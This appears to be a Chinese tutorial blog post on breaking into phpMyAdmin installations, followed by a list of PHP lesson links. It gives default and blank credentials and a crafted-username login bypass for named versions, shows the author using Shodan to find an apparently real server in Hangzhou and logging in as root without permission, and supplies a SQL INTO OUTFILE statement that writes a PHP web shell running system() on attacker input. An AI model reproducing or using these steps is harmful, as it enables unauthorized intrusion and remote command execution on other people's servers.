phpMyAdmin通过密码漏洞留后门文件
时间:2022-07-27
本文章向大家介绍phpMyAdmin通过密码漏洞留后门文件,主要内容包括其使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。
- 默认 phpMyAdmin:用户名 root 密码 root 或空登陆。
- 版本 2.11.3~2.11.4:用户名
'localhost'@'@"
登陆,无需密码。 - 版本 2.11.9.2:用户名
root
登陆,无需密码。
经测试,第二个漏洞在 phpMyAdmin 3.5.1 版本也是可行的。原理从略。
下面让我们简单的上网看看能不能找到一些存在这样漏洞的登陆页面。
祭出著名的漏洞搜索引擎 Shodan 并搜索 phpMyAdmin。
phpMyAdmin
先看看有没有不需要密码登陆的,逐一尝试没有后寻找名字中包含的版本号。这里我找到一个国内的(浙江省?杭州市)。
地址已手动打码。
http://121.***.*.219:80/
登陆成功(root 权限)。
接下来你可以写一个 outfile 到对方主机的网络目录下。俗称 “留后门”。
SELECT "<?php system($_GET[‘cmd']); ? " into outfile "后门文件的绝对路径"
点击运行,不出意外便在对方主机留下了一个名为 runme.php
的后门文件。
总结
以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作具有一定的参考学习价值,谢谢大家对网站事(zalou.cn)的支持。如果你想了解更多相关内容请查看下面相关链接
- php概述
- php教程
- php环境搭建
- PHP书写格式
- php变量
- php常量
- PHP注释
- php数组
- php字符串 string
- PHP整型 integer
- PHP浮点型 float
- php布尔型
- php数据类型之数组
- php数据类型之对象
- php数据类型之null
- php数据类型之间的转换
- php运算符
- php表达式
- PHP循环控制
- PHP流程控制
- php函数
- php全局变量
- PHP魔术变量
- php命名空间
- php 日期
- PHP包含文件
- php文件
- PHP 文件上传
- php Cookies
- php Sessions
- php email
- php安全email
- php错误处理
- PHP异常处理
- php过滤器
- PHP 高级过滤器
- php json
- php 表单
- PHP MySQL 简介
- PHP 连接 MySQL
- php创建数据库
- php 创建表
- php mysq 插入数据
- PHP MySQL 插入多条数据
- PHP MySQL 预处理语句
- php mysql 读取数据
- php mysql where
- PHP MySQL Order By
- PHP MySQL Update
- PHP MySQL Delete
- php ODBC